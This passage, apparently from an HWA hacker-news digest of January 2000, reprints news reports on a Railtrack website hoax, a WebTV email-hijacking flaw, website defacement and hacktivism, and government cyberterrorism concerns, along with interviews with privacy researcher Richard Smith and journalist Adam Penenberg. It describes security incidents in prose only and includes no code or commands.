-=-

Reuters:

Posted at 8:14 a.m. PST Friday, December 31, 1999

Hackers break into rail network's Web page

LONDON (AP) -- Hackers broke into an official Web site and issued a false warning that train service in Britain had been canceled Friday due to millennium bug problems.

The warning, which read ``No trains today,'' was discovered on Railtrack's Internet site at about 9 a.m., officials said.

The hoax message also sent greetings to all Railtrack directors and ``all the sheep in Wales.''

Instead of the usual menu, which lets people check train timetables around Britain, the hoax message said no trains would run from New Year's Eve until Jan. 3 because of Y2K computer problems.

The rest of the site was still operating, but more difficult to access, officials said.

After discovering the hoax, computer experts had it fixed by 11:30 a.m., said Railtrack spokeswoman Lynn Harvey.

``It was annoying rather than a problem,'' Harvey said. ``People were inconvenienced.''

Many Britons rely on the Web site to check timetables to plan their travel arrangements.
Particularly with the long holiday weekend, the number of people relying on train service was expected to be high.

``This is a prank which is supposed to be amusing,'' Railtrack, the company that runs Britain's rail lines, said in a statement. ``Unfortunately it will affect hundreds and thousands of people who are trying to get into London for the Millennium Eve celebrations.''

-=-

@HWA

43.0 WebTV Hole Causes Spam 01/04/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

"I want, I want, I want my WebTV"

From HNN http://www.hackernews.com/

contributed by Evil Wench

Exploit code currently circulating on the internet allows someone to send email from a WebTV user's box without the user's knowledge and can also be used to compromise the security of users' stored mail. The exploit is being embedded in posts in WebTV's alt.discuss newsgroups, emails, and web pages. It then directs any WebTV box that loads the page to send an email message to an address set in the code.

Net4TV
http://net4tv.com/voice/story.cfm?StoryID=1823

Wired
http://www.wired.com/news/technology/0,1282,33420,00.html

WebTV Security Breach: Hijack Code Can Forward Stored Mail

Laura Buddine (January 2, 2000)

Net4TV Voice has learned that the "hack" code that is being used to send email from a WebTV user's box without the user's knowledge also is being used to compromise the security of users' stored mail.

The code, which is being embedded in posts in WebTV's alt.discuss newsgroups, emails and web pages, directs any WebTV box that loads the page to send an email message to an address set in the code. The code executes "in the background;" users who have sent the mail do not see any indication of mail being sent, and only find out about it if they receive a reply or look in their Sent Mail folders.

Now, Net4TV Voice has learned that the code has even more serious security implications. It also has been used to forward email from users' own Sent Mail and Saved Mail folders to an address set in the code.
Although hackers cannot directly see the email that a WebTV user has within his/her own account, they can forward it out into their own email account on another service, helping themselves to a user's private correspondence and information. Net4TV Voice has been shown how this can be done, and also has heard from one user whose email account has apparently been violated.

Code Known At Least Since September

The basic email code that is the key to controlling a WebTV user's mailbox has been known by some users since at least September, when it was discussed in one of the WebTV hacking newsgroups. A number of the frequenters of the group used the code to create "receipts" in their mail so that they would receive a mailback when the email was opened and read, or as a watch of their web pages so that they could see who was surfing it.

"It was not intended to be used for malicious purposes," wrote one of the WebTV users who made use of the code. "Of course, some with questionable intent got a hold of the code and used it for other than the original purpose."

Mods Know About Code, But Customer Service, Abuse Don't Get It

Among other things, the code has been used to bombard WebTV's Abuse Department with profane complaints, and to cause users to unknowingly send nasty messages to others. One of the problems is that there is no way within the email itself to prove that the box it came from did not originate the email; one WebTV user has written to Net4TV Voice that WebTV's Compliance Department is threatening her with termination for "spamming," even though the email is being triggered by an email containing the code that is in her box.

On December 21, a moderator in the official webtv.users newsgroup posted a warning that users should not go into a hacking newsgroup because of the code. The warning, which was published in Net4TV Voice's mid-issue story, User Alert: WebTV Email 'Hack' Can Send Mail From Your Box, claimed that the code itself was created by "some users."
In fact, the code was created by WebTV itself (as were all elements and codes in the WebTV software). Net4TV Voice has since been advised that the code itself was previously posted in webtv.users and was "slipped past the mods."

Often, the emails containing the code also contain another "no send" code that prevents them from being forwarded or "bounced." This prevents the trouble-making mail, post, or page from being forwarded to WebTV Abuse as evidence. This has led to some ludicrously frustrating exchanges with WebTV Customer Service in the WebTV Help Center, which insists that they cannot do anything and that posts must be forwarded to Abuse before action can be taken.

WebTV user JaxRed offered this example that he had received after he wrote to them explaining the problem and that the posts had "no send" codes preventing them from being forwarded:

    Dear Customer,

    Thank you for writing WebTV. We understand your concern regarding this matter. However, this is not an issue that the Customer Service Center, can help you with. We apologize for the misunderstanding on our part regarding this matter. However, this is a matter that you will to forward (sic) on to Abuse@webtv.net. Abuse will look into this matter further for you. Please forward any and all the information that you have regarding this matter to Abuse@webtv.net. Please only forward this matter once, as if this issue is forwarded more than once there is a chance that this issue will be rejecked.(sic)

Another user, however, received a different response from the Customer Service Center when she complained about a post made by a self-proclaimed hacker:

    Dear Customer,

    Thank you for writing WebTV. We are aware of this issue and are working on removing this person. We do appreciate your feedback. I will pass this information along for you.
Waiting for WebTV's Response

Net4TV Voice contacted WebTV Networks on Thursday in preparation for this story, but were advised that because of the New Year's holiday, they would be unable to respond until January 3. Although we declined to hold the story to wait for their response, we will post an update to the story when we receive it.

However, Net4TV discussed the issue with a former WebTV employee who was involved in the operation of the WebTV servers. These were his comments:

    WebTV's machines already filter certain content before sending it along to our boxes. They call it transcoding. Essentially what happens is they replace certain HTML with their own, mainly for their own security but also for functionality in some cases.

    What this means is that WebTV's machines already go through every line of code, whether on a web page or in an e-mail or newsgroup post, looking for the offending HTML and transcoding as necessary before our boxes receive it. That's why I can't understand what's taking them so long to fix this thing.

    It's probably easier said than done but a quick solution would be to add this mail exploit code to the list of code they're already filtering and be done with it, at least until they can address the problem more thoroughly in a future client build. That'd have to be done eventually because there are certain situations where our boxes by-pass WebTV's machines (and thus the transcoding) but in the meantime the overwhelming majority of the problem would be solved.

WebTV's Security History

This is not the first time that codes that WebTV created for their own purposes have either been leaked or discovered by users and used to create security holes and "bombs." About eighteen months ago, WebTV's email was actually hacked by a WebTV user, who was then trapped by a "hacking contest" that got him to reveal how he had done it. The hack was reported by the "trapper" to WebTV and that hole was closed.
But more holes remained, including some that had many WebTV users playing "Doom" long before it was released (and only to DishPlayer users). Last spring, some WebTV users found another code that could be used to insert and rearrange Favorites folders in other users' boxes, while the use of a WebTV code that could wipe out users' accounts (the Amnesia Bomb) caused such problems that WebTV was forced to rush out a browser update to stop it (Amnesia Bomb Halts Plus Update).

The most serious security breach was revealed in September, when Net4TV Voice broke the story WebTV Spam Block Revealing User, Subscriber IDs. WebTV tried to downplay the seriousness of the breach, claiming that nothing could be done with the IDs even if they were revealed (not true -- with a user ID known, it was possible to terminate a user's account remotely); WebTV's Customer Service department even sent email to users in which they claimed that the Net4TV Voice story was "bogus" and that Net4TV was working with spammers to get the maximum amount of spam delivered to WebTV users. When confronted by CNet and ZDNet, however, WebTV admitted the security breach was true but stated that it had been fixed.

Microsoft itself has also had its security problems, with breach after breach in HotMail security finally causing the company to announce that it was calling in an independent outside auditor to review its security. Microsoft would not release the name of the auditing company, stating only that it was one of the "big five," but did admit that its biggest breach had been caused by a string of code that hadn't been tested for security. When the flaw was first revealed, Microsoft claimed that its security had been broken by sophisticated hackers, armed with powerful software tools. In October, Microsoft announced that Truste had OK'ed the security fix at HotMail.

Security and privacy are two areas of growing concern, as the U.S. continues to use a "voluntary action" and "self-enforcement" approach rather than the stringent protection of the individual's personal data that the European (EC) countries require. The U.S. privacy laws are a patchwork of state and federal laws, rules, and regulations that have numerous loopholes, and as databases link up and make it easier to create detailed profiles on any citizen, there is increasing call for a general privacy policy to replace today's patchwork.

WebTV itself has also drawn fire because of its collection of user data; although then-CEO Steve Perlman revealed in October 1998 that WebTV was recording its users' activity on the Net and on TV (see WebTV Is Watching You), it did not offer its users the ability to "opt out" of being recorded until the HipHop upgrade in November, 1999, over one year later.

"It's not that I only don't trust WebTV not to sell information they have on me," wrote one user to Net4TV Voice, "I don't trust them not to just let it out accidentally because they didn't lock the door. I'm beginning to wonder if they even care about anyone's secrets except their own. I just traded up to a new WebTV Plus and I used my son's credit card. He's got a different name and a different billing address -- but they never even asked for anything except a card number and an expiration date... it could have been anyone's."

-=-

Wired;

WebTV To Patch Email Hole
by John Gartner

3:00 a.m. 4.Jan.2000 PST

WebTV is working on a fix for a security hole that enables third parties to send email from WebTV accounts.

Malicious programmers have been embedding the HTML of Web pages and newsgroups with stealthy code that can force email accounts into sending messages without the user's knowledge.

The security hole was first reported on Net4TV. The code is being used to spam WebTV's abuse mailbox and could be used to send emails to unsuspecting third parties.
On Tuesday, a WebTV spokeswoman acknowledged the security problem, and said that the company was working on a software patch that would be posted today.

WebTV users can determine if their email account has been compromised by checking their "sent" folder for email and identifying anything that does not look familiar, the WebTV spokeswoman said.

WebTV will update their server software to remove the vulnerability; users will not have to download any additional software, according to the company.

According to Laura Buddine of Iacta.com, the parent company of Net4TV, the code was first made known to hackers in September, but has become widespread during the last week. "At this point, this code is all over the place," said Buddine.

The offending code has been placed on newsgroups that are accessible only to WebTV users, as well as on hacker newsgroups such as alt.discuss.webtv.hacking, according to Buddine. She said the code was originally written by a WebTV employee but has since turned into a tool for ne'er-do-wells.

"I could envision someone using it to get others in trouble by sending death threats from other people's accounts," Buddine said.

Buddine said that she has received more than 10 emails from WebTV users who claim to have been affected. WebTV said that the user impact has been minimal with only one user reporting malicious mail being sent.

In addition to being able to generate email without the user's knowledge, the code can be engineered to forward email from sent mail or saved mail folders.

According to Buddine, a WebTV employee acknowledged the existence of the security hole on 21 December, and posted a warning to WebTV users not to visit the alt.discuss.webtv.hacking newsgroup because it would cause erroneous messages to be sent to the WebTV abuse mailbox.

Buddine said that hours after Net4TV posted the story on Monday detailing the hole, WebTV blocked the Net4TV mail servers from sending email to WebTV users.
WebTV posted the Net4TV IP address on the list of spammers. Buddine said email emanating from the Net4TV IP address was denied as of 4 p.m. PST Monday. She said Net4TV's attorney sent an email to WebTV early Tuesday, and their IP address was removed from the list approximately 20 minutes later.

In September, Net4TV reported that WebTV email accounts that were full would disclose subscriber and user ID information as part of an automatic reply. WebTV subsequently fixed the problem.

@HWA

44.0 Vandalism or Hactivism? 01/04/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by evenprime

For the most part web defacements over the last year have been nothing but vandalism executed by kids looking for bragging rights amongst their peer group. Hactivists struggled throughout 1999 to find an identity and separate themselves from this activity. MSNBC takes a look at these two issues and more in their report.

MSNBC
http://www.msnbc.com/news/351434.asp?cp1=1

Electronic vandalism runs amok

1999: A year in which the electronic underground came of age

(PIC) The FBI's Web site was among those victimized by hackers who defaced government sites this year.

By Brock N. Meeks MSNBC

WASHINGTON, Dec. 29 — Digital vandalism jumped on and off the national stage this year fueled by hyperbole, spawned largely by fear, uncertainty and doubt. Few of these exploits were of any real note and served largely as an embarrassment to apathetic systems administrators whose computers were easy targets for kids with too much time on their hands and the patience to download any of the numerous “do-it-yourself” break-in tools lingering in murky digital corridors of the Internet.

‘To date, the vast majority of Web site defacements have been a mere collection of invectives, profanities and little else. No real statements of or for any political cause have ever been made, even when the domain that was hit presented an optimal forum for such statements.’
— JAY DYSON, systems administrator for NASA's Jet Propulsion Labs

THE FEDERAL BUREAU OF INVESTIGATION kept chasing these computer vandals, scaring many, arresting some and prosecuting even fewer. In one of the most infamous moves this year, the FBI executed a multi-state raid on a dozen or more people in the aftermath of several high-visibility government Web site defacements, most notably the official White House Web site, the show pony of the federal government.

The FBI eventually tracked down and prosecuted the perpetrator of the White House Web site break-in and in return bought itself a kind of digital holy war. Every kid that fashioned him or herself a “hacker” began defacing Web pages, seemingly at will, leaving enough mangled prose and pretzel logic screeds to drive a high-school English teacher into early retirement.

The self-fueling “war” against the FBI eventually led to the Bureau’s own electronic back yard when its official Web site was attacked and was out of commission for a week.

Has the FBI beefed up its ability and effectiveness in corralling these electronic joy riders? No, says Brian Martin, a computer security consultant and staff member of Attrition.org, a Web site that acts as an archive for hacked Web sites. The FBI “has just been lucky that some of these defacers are piss-poor hackers,” Martin says. The defacers “leave obvious trails… and brag about their exploits on IRC from their home accounts, basically giving themselves up,” Martin says.

HACKER, HEAL THYSELF

Those who traffic in the electronic underground often form “organizations” that are loose coalitions of allegiances. Some last for months, some a few days; often, one is a member of several different groups at the same time.
These digital tribes brand themselves and their exploits so that bragging rights can be more easily tossed around, not unlike the way graffiti artists “tag” their works with a spray-paint can.

Stupid and careless acts have usually been addressed between members of the same or competing groups, off the radar screen of the press and public in what amounted to little more than locker room pejoratives being electronically hurled at one another as fast as one could misspell any word with more than two syllables.

But this year saw the emergence of public upbraiding for inane acts in what the Hacker News Network called “a turning point in the underground hacking community.” An underground group called the “Legions of the Underground” unilaterally declared a full-scale “cyberwar” on the computing infrastructures of China and Iraq, citing human-rights abuses and the production of weapons of mass destruction as justification.

‘Unless the domain is specifically targeted, defaced with a specific message that is relevant to the domain and current events, it is weak justification at best. Hacking www.mom-and-pops-store.com with a “free Switzerland” message just isn’t logical.’
— BRIAN MARTIN, Attrition.org staffer

The reaction from within the underground community was a swift and unrelenting condemnation of LoU’s intent. LoU quickly recanted, claiming it never really had destructive intentions and laying the confusion at the feet of the clueless media.

But in a joint statement released by several long-standing and well-known hacking groups — including 2600, Chaos Computer Club, Cult of the Dead Cow, L0pht Heavy Industries and others — the LoU action was publicly condemned.
In the joint communiqué, groups said they “strongly opposed any attempt to use the power of hacking to threaten or destroy the information infrastructure of any country, for any reason.”

FALL OF THE RISE OF HACKTIVISM

This year also saw the de-evolution of so-called “hacktivism,” which is political speech wrapped around the act of defacing Web sites. In the beginning, such defacements carried valid political messages placed on cracked Web sites as a valid means of protest.

Such political acts were quickly “adopted” by garden-variety computer vandals — “script kiddies,” as they are derisively known in the underground — as a means of trying to validate routine and mindless computer break-ins.

In the joint statement condemning the LoU plans, the coalition of hacker groups noted that hacktivism “may be a legitimate use of hacking knowledge,” but that there was a thin line between political activism and “wanton destruction” of computer property.

“To date, the vast majority of Web site defacements have been a mere collection of invectives, profanities and little else,” said Jay Dyson, a systems administrator for NASA’s Jet Propulsion Labs who battles daily with computer break-in attempts. “No real statements of or for any political cause have ever been made, even when the domain that was hit presented an optimal forum for such statements,” Dyson said.

Most hacktivism, Dyson said, “strikes me as an afterthought, something the intruder does to legitimize the system breach to themselves or their peers.”

Ninety-nine percent of alleged acts of hacktivism are “a thinly veiled charade to mask electronic joyriding,” said Attrition.org’s Martin. “Unless the domain is specifically targeted, defaced with a specific message that is relevant to the domain and current events, it is weak justification at best. Hacking www.mom-and-pops-store.com with a ‘free Switzerland’ message just isn’t logical,” Martin said.
“Hacking www.oppress-switzerland.org with a valid rant about why it is ethically or morally wrong to do so then falls under ‘hacktivism.’ Everything else is script-kiddy delusion of moral justification.”

THE REAL DARK SIDE

Finally, this year saw persistent rumors crop up of a mysterious international figure known in the electronic underground as “Virus.” This person reportedly trolls the Net, soliciting hackers to break into government computers looking for intelligence of all types and offering them money if they are successful.

Those contacted by Virus say he claims his name is “Khalid Ibrahim.” MSNBC has contacted at least four individuals who say they’ve been contacted by “Virus.” One hacker was asked to break into government sites in India and Pakistan looking for information on missiles capable of carrying nuclear warheads.

According to sources interviewed by MSNBC, Virus claims to be based in India, and evidence given to MSNBC apparently confirms that he is logging in from an ISP based in that country.

Those contacted by Virus and interviewed by MSNBC say he claims not to be a terrorist; his real motivation for collecting the data remains unknown. Messages sent by MSNBC to alleged e-mail accounts owned by Virus and attempts to contact him via Internet chat services, such as ICQ, have not been answered.

One hacker contacted by Virus claims to have received $1,200 from him, though MSNBC was not able to confirm the payment.

MSNBC has confirmed that the FBI has questioned several hackers the Bureau’s agents have raided about the existence of Virus and whether or not they have done any work for him. To date, the real identity, location and motivation of Virus remains unknown and he is still trolling the Net.
@HWA

45.0 No Longer Worried About Y2K Feds Look to Security 01/04/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by mphantasm

Since Y2K is over the FBI and other agencies have set their sights on terrorists, hostile nations, criminals, and other cyber evil-doers as they prepare to protect our nation's infrastructure.

CNN
http://www.cnn.com/2000/TECH/computing/01/02/cyberterrorism/

Governments ready to fight cyber-crime in new millennium

January 2, 2000
Web posted at: 4:29 a.m. EST (0929 GMT)

From Justice Correspondent Pierre Thomas

WASHINGTON (CNN) -- In 1997, a Worcester, Massachusetts, teenager used his computer to knock out communications at an air traffic control tower -- for six hours.

In March of 1999, a programmer unleashed the Melissa virus, disabling thousands of computers around the United States.

And every day, the Pentagon is the target of as many as 100 hacking attempts.

As a new century begins, cyber-crime, including electronic terrorism, looms as a new way for criminals to threaten global security.

According to Richard Clark, the coordinator for security, infrastructure, protection and counter-terrorism at the National Security Council, our dependency on computers will make us increasingly vulnerable.

"They (computers) run our electric power grid, our telecommunications network, they run our railroads, our banking system, and all of them are vulnerable, at some level, to some degree to information warfare, or cyber-terrorism," Clark said.

"There really is a broad spectrum of people, groups and countries that engage in cyber-attacks as a general matter for different purposes," said Michael Vatis, director of the National Infrastructure Protection Center at the FBI.
'It's a very serious threat'

Terrorists, hostile nations, criminals, hackers -- they all present a wide variety of threats and create new pressure for intelligence, defense and law enforcement around the world.

The FBI computer crime case load has doubled each of the last two years. In October, the FBI reported 800 pending cases.

"According to the National Security Administration, there are over a hundred countries that are working on techniques to penetrate our information infrastructure," said Sen. Jon Kyl, R-Arizona. "Many of them are aimed at the Defense Department and high security areas in both the private sector and the government, so it's a very serious threat."

The government is working to prepare for electronic assaults, much the way it prepares for other forms of terrorism.

"Our mission is to try to help protect the nation's critical infrastructures," said Vatis.

"Somebody sitting with a laptop computer and a modem connection on the other side of the world can attack those things if they don't have good security," said Vatis.

Added Clark, "There are governments that are building units, military units and intelligence units, to engage in information warfare. They are developing capabilities, they are building the units, and in some cases they seem to be doing reconnaissance on our computer networks."

Countries develop anti-hacker squads

Cyber-criminals have a major advantage: They can use computer technology to inflict damage, while simultaneously reducing their risk of getting caught.

"Terrorists still prefer car bombs, you know. A car bomb still has a lot impact than a cyber-attack," said Richard Power with the Computer Security Institute. "But there is always the possibility that somebody could make some kind of dramatic statement by bringing down some aspect of the infrastructure."

Some nations have developed computer anti-hacking teams to block and investigate crimes in cyberspace.
But officials say as technology rapidly advances, preventing cyber-crime and catching cyber-criminals will only become tougher.

@HWA

46.0 Interview With Richard Smith 01/04/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond

Privacy advocate and cyber whistle-blower Richard Smith has given a rather extensive interview to the Boston Globe. Now retired from Cambridge based Phar-Lap Software, a company he headed for 13 years, Smith looks for privacy loopholes online.

Boston Globe
http://www.globe.com/dailyglobe2/002/city/A_whistle_blower_out_to_save_cyber_privacy+.shtml

A whistle-blower out to save cyber privacy

By Andreae Downs, Globe Correspondent, 1/2/2000

BROOKLINE - The man who helped bust the writer of the Melissa computer virus, the man who has been behind several cyber headlines about on-line privacy or the lack thereof, lives, actually, a rather private life on a hill in Brookline.

Richard Smith, 46, enjoys stripping the glitz off Web pages and finding out what's underneath. What he's found, after about a year of digging, is that more information is being gathered about Web surfers than most people suspect.

''I look at it from a technical standpoint, how it all works,'' Smith said in a recent interview. ''And then I compare it to what the companies say they do.''

Smith has been called a ''living treasure of the Internet'' by those interested in on-line privacy issues.

''Before him, nobody seemed to be watching the e-store,'' said Jason Catlett, president of Junkbusters Corp., an on-line company based in New Jersey that also investigates computer privacy matters. ''Even the knowledge that there's a whistle blower in cyberspace is surely keeping some of the worst schemes of marketers from reaching implementation.''

Smith retired in September from Phar Lap Software, a firm he founded and led for almost 13 years.
Phar Lap, in Cambridge, specializes in software tools for the remote control of embedded computer systems in things like weather stations and automatic teller machines.

Smith and his family moved from Needham to Brookline about a decade ago so that his step-daughter, Anna Shusterman, now a science teacher, could attend Brookline High School. He was also interested in reducing his commute to Cambridge.

The nice thing about Brookline, Smith said, is that it feels like a college town without having a college in it. ''I grew up in the South in a college town,'' he said. ''So I felt comfortable about that.''

His privacy passion stemmed from a furor last year about a ''leaky window'' in the Pentium III chip. Critics claimed the chip could have made all Internet transactions traceable, by leaving a discernible code number.

Smith found many older computers and browsers were already potentially traceable in the same way.

So what's the big deal?

''These numbers are sort of like a Social Security number,'' he said. ''If you keep using the same identification number, different databases can be correlated. So you're not anonymous; they can uncover your name, address, and phone.''

Smith believes user traceability could lead to an increased amount of junk mail and calls; for instance, if you check up on mortgage rates in the morning on the Web, you could get an evening call from a mortgage banking firm.

''Marketing firms claim that they are only planning to use this information to target their audiences better,'' he said. ''I don't buy that.''

Smith has found that agencies that put those flashing banner ads on Web sites also collect data on what people at a site are typing or clicking on, one reason the ads become increasingly relevant to your Lycos or AltaVista search, for instance.

''But nobody tells you this is happening,'' Smith said. ''And we don't know how they are using the information, there's no disclosure.
Is it more than market research?''

Certain software that one can download from the Internet, such as the comic cursors from Comet Cursor, will tell a central server where someone is surfing; and Real Jukebox, once downloaded, can tell a central server what music CDs a user subsequently listens to on their computer.

Also, some spam (unsolicited direct marketing e-mail) contains code to let a central computer know if the recipient opened the mail.

''The problem is it doesn't let you choose whether to let them know, but they now know if you are interested in this product,'' he said. ''It is potentially crossing the line of overriding user desires.''

Smith is particularly incensed about Comet Cursor, which is aimed at children. A visit to a children's Web site will trigger an option to download the software to change your cursor to a particular comic book character. If you decline, the question pops up again every time you visit the site.

''The nag factor alone is annoying,'' he said, but that the cursor software once downloaded then reports your presence on future Web sites that have the customized cursor option to an unknown central computer is ''kind of creepy.''

''The question is what is this company going to do with this information?''

Smith thinks some company snooping will eventually have to be regulated for it to stop.

''It's a matter of awareness first,'' he said. ''But inevitably, there will be regulating so that profiling'' -- the collection of data about you and your consumer preferences -- ''is an explicit option you consent to.''

To get rid of some tracking, users can install software that disables so-called ''third-party cookies.'' Cookies, in Internet parlance, are small programs in your personal computer that allow a Web site you've visited before to recognize you. That's why a particular airline site knows to open at reservations to your favorite city first, or why a book site might give you increasingly relevant book suggestions.
Cookies are not all bad, Smith argues, but you should be told they are there.

Another option is so-called anonymizer software, which covers your Web tracks by using a central server or by stripping out cookies. Smith looked into three of these, however, and found it is possible to break them, although it's not necessarily being done.

Smith's passion now is strictly volunteer. He estimates he spends about 30 hours researching a topic before dropping a carefully crafted media bomb.

He could, he said, eventually do it for pay. He helped track down the New Jersey-based creator of the Melissa virus that attacked thousands of computers last March, and it was his research that led Real Networks Inc. to agree to publish a software ''patch'' to prevent its product, Real Jukebox, from collecting information on users. Some companies with snooper functions on their Web sites have approached him to help prevent future embarrassments.

For the moment, Smith says, he prefers his volunteer detective work, which he does on two computers in the third-floor office of his cavernous home with a view of the Boston skyline. He is kept company by wife Faina, daughter Polina, and a new puppy, a failed attempt by Faina to force him to walk outside more and meet the neighbors.

''I expect at some time I'll go stir crazy,'' he said of his current home-office isolation. ''But so far, I've been pretty busy talking on the phone; I haven't needed to get out.''

This story ran on page 01 of the Boston Globe's City Weekly on 1/2/2000.
© Copyright 1999 Globe Newspaper Company.

@HWA

47.0 Interview with Adam Penenberg 01/04/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by dave920

Black Market Enterprises conducted an interview with Adam Penenberg of Forbes Magazine as part of the new section of BME Online: HYPE. Penenberg is the author of numerous technical articles including ones about AntiOnline, Se7en and other underground events.
The article includes personal impressions of Penenberg as well as the interview itself. The article can be found at:

Black Market Enterprises
http://www.b-m-e.com/features/hype-penenberg.html

HYPE

Interview with: Adam Penenberg, 37, of New York City, New York

dave920: What is your greatest fascination with computers?

Adam Penenberg: I'm not so much interested in computers as I am with the broader issue of technology, primarily the way it changes us, our culture and our way of thinking. Ever go to a rock concert only to be disappointed the band doesn't sound as good live as it did in the studio? The drums are too loud, the bass fuzzy, the acoustics suck, the vocals don't sound as sweet? But that's real music; it's recorded music that's not real. Yet we have been influenced by the unattainable "perfection" of recorded music. It's more real to us than real music.

This is just one way we have been influenced by technology. Another is online chat. In some instances someone's online moniker becomes more important, more real to him, than his real world name. And the experiences he has in cyberspace--the online conversations, flirtations and dalliances, his triumphs and tribulations--become more important to him than his real-world experiences. This is certainly true for some software pirates and hackers who hang out on IRC all night.

Technology is changing who we are and how we think. As a journalist I believe there's nothing more worthy of coverage.

Who or what introduced you into journalism, and what made you decide to focus on the computer industry?

I got into journalism by accident. In 1991, after living and traveling abroad for 4 years (and utterly clueless as to what I would do with my life) I was walking by Katz's Deli on the Lower East side of New York. Katz's has this ancient sign: "Send a salami to your boy in the army." ("Salami" and "Army" rhyme when you say them New Yawk style.)
It was the time of Desert Storm and I noticed Katz's was shipping salamis to soldiers in the Middle East. I pitched it to The New York Times Living section and long story short they published it, even though I had no prior experience. I thought, This freelance writing is easy, then practically starved for years.

When I started writing for The Sunday New York Times Long Island section in the mid 1990s, "the guyland" was transitioning into a tech economy. Until then I was writing environmental stories for the Times, since there was always some environmental disaster happening. But then I got a taste of tech and have focused on it ever since. My favorite Times lead for a tech story I wrote: "Flying through a virtual colon, according to Dr. Ari Kaufman, is a lot like playing a Star Wars video game."

Have you previously been recognized for your contributions to the computer industry? If so, what were they?

Nope, not by the computer industry.

How often do you use your computer(s), and what do you mainly use them for?

Every day. I use a Mac G3 laptop at home and a G3 desktop at work. Basic stuff, mostly net surfing and email. I learned on a Mac in college and like the interface. I like the fact that you plug something in, it works immediately. I like that Mac has always been Y2K compliant. I detest the Windows OS--there's something creepy about it if you ask me--and dislike the feel and touch of most PCs. If you don't understand just ask a Mac user for a demonstration.

Are you afraid of Y2K? What do you think will happen?

I'm not afraid of Y2K. I'm afraid of people's reaction to unknown fears. I figure we would have experienced Y2K-related glitches by now, since many payroll databases look ahead months. Or how about the Sept. 9th trigger date (9999 is an error code, so they say), which didn't trigger anything? Ho hum. There may be minor glitches but I can't imagine anything that bad happening here. Like on the scale of that awful NBC Movie "Y2K".
But that's not to say nothing will happen. You have to assume phone circuits will be overloaded right after midnight, as people call to wish each other Happy New Year. And I'm thinking that we as humans will burn record amounts of energy, as the lights stay on in 18 time zones. All night. Everywhere. Lights could flicker on and off, though I doubt there will be Y2K-related brownouts. Phones could go out at the same time. And people could mistake this for Y2K Armageddon. Pull up a chair and pass the chips and salsa. The Revolution will not be televised.

If you could use a computer to significantly change the world in one way, what would it be? Why?

If I could use a computer to change anything, it would be the educational system in this country. Get kids excited about learning. Make it challenging and fun and interesting and relevant. For too long children have been let down by irresponsible politicians willing to spend billions on pork barrel projects but little on text books and teachers. It's shameful and it's not getting better. Another thing: I'd make the Ray Charles version of "America the Beautiful" our National Anthem.

What do you enjoy about working for Forbes.com? What other organizations have you written for or worked at?

Actually I'm a columnist for Forbes.com and a senior editor at the magazine. As a columnist for the Web site I get to stretch out and explore topics that interest me, from cyberterrorism to politics and activism to hackers and e-commerce. A column is an opinion piece, and I have a lot of opinions. And I like being on the Net.

At the magazine I write investigative pieces, usually with a technology focus. For instance, my last article for the magazine was a cover story called "The End of Privacy".
(http://www.forbes.com/forbes/99/1129/6413182a.htm) I had an online information broker investigate me and within a week he pulled up my social security number, date of birth, salary, bank balances, long distance phone records and utility bills (how much I pay for gas and electric). I've also written about Kevin Mitnick, who I interviewed a number of times, The New York Times hackers and Netbus's battle against Symantec and Norton. For an information junkie like me, I have the perfect job.

Before Forbes, I was at Forbes.com. Before that, I wrote for Wired after they launched their news service on Thanksgiving 1996. And before that I freelanced regularly to The New York Times, including the Sunday Book Review. I also sold pieces to Playboy, Glamour and World Art, among others. I've been to Cuba and Mexico for stories I did for environmental magazines.

How do you obtain subject matter for your articles, and what do you primarily enjoy to focus on?

I get stories a whole bunch of ways. Sometimes I'll surf around and something will catch my eye. Or someone will email me a tip. At times a publicist will call with a good idea. Or my editor might tell me to do a story on, say, MP3, and I'll find an angle. You just have to have a nose for a good story. They're everywhere.

What was your overall intention when you published the article about JP, founder of AntiOnline? What type of feedback did you receive from it? Did JP threaten you or Forbes.com, as he has so many others, with a lawsuit?

Nah, JP hasn't threatened anything or said anything, except to crow about the fluff piece about him that ran in the New York Times. What is with the Times tech coverage? They consistently repeat the John Markoff-inspired canard that Kevin Mitnick hacked NORAD as a teenager--the inspiration for the movie War Games, the Times claims--yet never checked it out. (It's bogus.) Then they publish a sloppy wet kiss about JP that, well, all I'll say is they should have fact-checked it first.
The feedback on my column was 100% positive. Every single email. And I got lots of email, too. It also provoked discussion on Slashdot. Seems JP doesn't have many supporters.

My intention was to stand up to JP on the issue of his using lawsuits to get his way. I figured he can't possibly have the money for a lawsuit, that he's just using it as a cynical tool of manipulation. And even if he did have the money, what sane person running a start up would waste precious venture capital on a slander lawsuit?

What do you think your greatest accomplishment regarding computers was?

I have no accomplishments regarding computers.

Do you find that because of your profession, computers have occupied more of your life than they should? Why or why not?

I stay away from computers outside of work. I keep my life as untechnical as possible. So I don't think I'm a candidate for a monitor tan.

What was your favorite article that you wrote? That someone else wrote?

Most of my daily reading is online, except for The Times, which I still read over coffee. I don't have any specific favorite sites. I bounce around a lot. Often readers or friends point me to stories on the Net.

Some stories of mine: (There's a complete list on Forbes.com [at] http://www.forbes.com/columnists/penenberg/past.htm)

1. "Hacking Bhabha: The inside story of the hack of India's primo nuclear research center"
   (http://www.forbes.com/tool/html/98/nov/1116/feat.htm)
2. "We were long gone when they pulled the plug" (about The New York Times hackers)
   (http://www.forbes.com/forbes/98/1116/6211132a.htm)
3. "Going once, going twice, HACKED!"
   (http://www.forbes.com/tool/html/99/mar/0319/side1.htm)
4. "The demonizing of a hacker" (Kevin Mitnick profile)
   (http://www.forbes.com/forbes/99/0419/6308050a.htm)

With regards to your column on Forbes.com, what do you think influences other Internet users the most?

I'd like to think Net users are most influenced by their own experiences, and make decisions based on their own surfing.
Like online trading. More people are participating in the economy than ever before. We all have a stake. It's exciting. And the reason is that regular web surfers and surferettes realized they didn't need a broker to tell them how to invest their money; they could do it based on their own experiences. That's one reason I believe Amazon stock shot so high. Users liked the Amazon shopping experience so much they thought, Heck, if I like it, lots of people'll like it, and keep coming back to buy books. So why not invest in the company's stock?

